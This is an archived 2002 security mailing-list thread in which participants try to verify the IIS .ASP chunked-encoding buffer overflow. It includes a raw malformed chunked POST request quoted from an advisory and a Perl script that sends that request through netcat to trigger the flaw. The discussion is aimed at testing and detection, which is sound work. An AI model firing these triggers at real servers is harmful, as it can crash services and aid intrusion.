RE: Windows 2000 and NT4 IIS .ASP Remote Buffer Overflow

[MadHat <madhat () unspecific com>]

Thanks, but I must have missed where the 100 continue return code was
the defining factor of vulnerability.

I can get this to return, but I have no way to verify vulnerability that
I can see.  The original description released by Marc said that a popup
appeared and that a message was entered in the Application Event log. 
Since I can not reproduce either of these symptoms, how do I verify
vulnerability.  If I send the same data as below to a patched host, it
still comes back with the 100 continue return code.

Oh and on the locked up I mentioned before, I meant that HTTP session
locked, not IIS itself.  Not something I can count on, since it didn't
seem to happen every time and did not seem to produce any of the signs
noted in the advisory.


On Fri, 2002-04-12 at 12:52, damdum wrote:
> It should be noted that the request must be properly formatted (not sloppy),
> this means using CRLF not just LF.  Here is a quick perl proggy:
>
> use IPC::Open2;
>
> $pid = open2(\*IN, \*OUT, "nc -nv 10.10.10.69 80");
>
> print OUT "POST /iisstart.asp HTTP/1.1\r\n".
>     "Accept: */*\r\n".
>     "Host: victom.com\r\n".
>     "Content-Type: application/x-www-form-urlencoded\r\n".
>     "Transfer-Encoding: chunked\r\n".
>     "\r\n".  
>     "10\r\n".
>     "PADPADPADPADPADP\r\n".
>     "4\r\n".   
>     "DATA\r\n".
>     "4\r\n".   
>     "DEST\r\n".
>     "0\r\n";
>
> $buff = <IN>;
> if($buff =~ /HTTP\/1\.1 100 Continue/)
> {
>     print "Got HTTP 100 Continue, sending returns...\n";
>     sleep 1;
>
>     print OUT "\r\n\r\n\r\n";
>     print OUT "\r\n\r\n\r\n";
>
>     print "Done\n";
> }   
> else
> {
>     print "Hrmm, didn't find HTTP 100 Continue, bye.\n";
> }
>
> close IN; 
> close OUT;
>
>
> -- 
> damdum
>
>
> Quoting MadHat <madhat () unspecific com>:
>
> > I have not been able to reproduce these results.  I have managed to lock
> > up IIS (IIS 5.0 with all patches pre Apr 1, 2002), but no popup messages
> > appear and no entries in the Application Log.  I have also been able get
> > the 100 Continue message (IIS 4.0 all patches pre Apr 1, 2002), but
> > still no popup or messages.
> >
> > Is there a reliable way to scan for these vulnerabilities remotely?
> >
> > On Thu, 2002-04-11 at 11:25, Erik Parker wrote:
> > > JM> Anyone have a proof of concept for this exploit?
> > >
> > > eEye included some. Use this with "netcat" or "telnet"
> > >
> > > replace [enter] with an actual pressing of your enter key (look at the
> > > bottom, you can cut n paste)
> > >
> > > It should return something like this, if it worked (and generate a popup
> > > error to you that says "Unknown has generated errors")
> > >
> > > HTTP/1.1 100 Continue
> > > Server: Microsoft-IIS/5.0
> > > Date: Wed, 27 Mar 2002 23:37:32 GMT
> > >
> > > If it fails, it'll say something like:
> > >
> > > HTTP/1.1 500 Server Error
> > > Server: Microsoft-IIS/5.0
> > >
> > >
> > > The application log will say:
> > >
> > > Active Server Pages service has started
> > > Access performance data was denied to IWAM_netbiosname as attempted from
> > c:\WINNT\SYSTEM32\Drwtsn32.exe
> > > **************Begin Session****************
> > > POST /iisstart.asp HTTP/1.1
> > > Accept: */*
> > > Host: eeye.com
> > > Content-Type: application/x-www-form-urlencoded
> > > Transfer-Encoding: chunked
> > >
> > > 10
> > > PADPADPADPADPADP
> > > 4
> > > DATA
> > > 4
> > > DEST
> > > 0
> > > [enter]
> > > [enter]
> > > **************End Session******************
> > -- 
> > MadHat at Unspecific.com
> > gpg --keyserver wwwkeys.us.pgp.net --recv-keys 9DDC3E98
> > Key fingerprint = E786 7B30 7534 DCC2 94D5  91DE E922 0B21 9DDC 3E98
-- 
MadHat at Unspecific.com
gpg --keyserver wwwkeys.us.pgp.net --recv-keys 9DDC3E98
Key fingerprint = E786 7B30 7534 DCC2 94D5  91DE E922 0B21 9DDC 3E98